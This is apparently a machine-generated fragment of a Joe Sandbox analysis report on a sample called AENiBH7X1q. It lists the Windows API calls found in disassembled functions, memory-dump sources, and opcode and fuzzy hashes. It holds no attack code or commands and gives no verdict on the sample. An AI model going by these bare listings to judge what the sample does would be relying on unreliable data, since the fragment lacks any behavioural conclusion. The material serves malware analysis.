                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2354583917-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenu.USER32 ref: 004776AA
• GetMenuItemCount.USER32(00000000), ref: 004776CC
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
• _wcslen.LIBCMT ref: 0047771A
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Menu$CountItemStringWindow_wcslen
• String ID:
• API String ID: 1823500076-0
• Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
• Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
• Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
• Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
• SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Window$Enable$Show$MessageMoveSend
• String ID:
• API String ID: 896007046-0
• Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
• Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
• Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
• Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
• GetWindowLongW.USER32(?,000000F0), ref: 00441452
• GetWindowLongW.USER32(?,000000F0), ref: 00441493
• SendMessageW.USER32(009B1A80,000000F1,00000000,00000000), ref: 004414C6
• SendMessageW.USER32(009B1A80,000000F1,00000001,00000000), ref: 004414F1
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
• Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
• Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
• Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
APIs
• _memset.LIBCMT ref: 004484C4
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
• IsMenu.USER32(?), ref: 0044857B
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
• DrawMenuBar.USER32 ref: 004485E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
APIs
• InterlockedIncrement.KERNEL32 ref: 0047247C
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
• Sleep.KERNEL32(0000000A), ref: 00472499
• InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: 0vH
• API String ID: 327565842-3662162768
• Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
• Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
• Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
• Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
• GetFocus.USER32 ref: 00448B1C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
• Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
• Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
• Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
• Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D32F
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
• __swprintf.LIBCMT ref: 0045D3CC
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %lu$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3164766367-3924996404
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
• Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
• Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
• Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
• Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415737
• __calloc_crt.LIBCMT ref: 00415743
• __getptd.LIBCMT ref: 00415750
• CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
• __dosmaperr.LIBCMT ref: 004157A9
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1269668773-0
• Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
• Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
• Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
• Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4166825349-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
• API String ID: 2574300362-3261711971
• Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
• Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
• Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
• Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
• Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
• Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
APIs
• GetClientRect.USER32(?,?), ref: 00433724
• GetWindowRect.USER32(00000000,?), ref: 00433757
• GetClientRect.USER32(0000001D,?), ref: 004337AC
• GetSystemMetrics.USER32(0000000F), ref: 00433800
• GetWindowRect.USER32(?,?), ref: 00433814
• ScreenToClient.USER32(?,?), ref: 00433842
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
• Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
• Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
• Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
• Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
APIs
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
• Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
• Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
• Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
• Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
APIs
• GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
